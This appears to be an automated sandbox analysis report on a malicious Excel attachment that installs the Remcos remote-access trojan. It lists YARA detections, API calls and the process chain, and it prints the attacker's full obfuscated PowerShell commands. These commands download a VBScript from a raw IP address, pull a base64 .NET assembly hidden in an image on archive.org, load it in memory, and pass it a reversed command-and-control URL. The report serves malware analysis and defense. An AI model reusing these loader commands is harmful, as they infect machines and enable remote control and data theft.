                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: bhv1E0C.tmp.21.drBinary or memory string: org.slneighbors
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLSX@38/28@5/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,21_2_004182CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,26_2_00410DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,21_2_00418758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,17_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ_0230909024SEPT.xla.xlsxJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GT4655
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR89E7.tmpJump to behavior
                Source: RFQ_0230909024SEPT.xla.xlsxOLE indicator, Workbook stream: true
                Source: B3930000.0.drOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................[.......[.....}..w.............................1......(.P..............3........!.............`-[.............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................s..l....}..w....`-[.....\.......................(.P.....................8...............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................s..l....}..w....`-[.....\.......................(.P.....................8...............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..4L........l......K.....(.P............................. .......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................`-[.....}..w.............4L........l......K.....(.P.......................!.....l.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`-[.....}..w.............4L........l......K.....(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`-[.............0..<;....WZ.....}..w....8.......@E......^...............(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`-[.................;....WZ.....}..w....8.......@E......^...............(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...[.....}..w.............................1......(.P..............3......................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................[.....}..w......[......................1......(.P.....................................................Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000017.00000002.525585538.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: RFQ_0230909024SEPT.xla.xlsxReversingLabs: Detection: 13%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
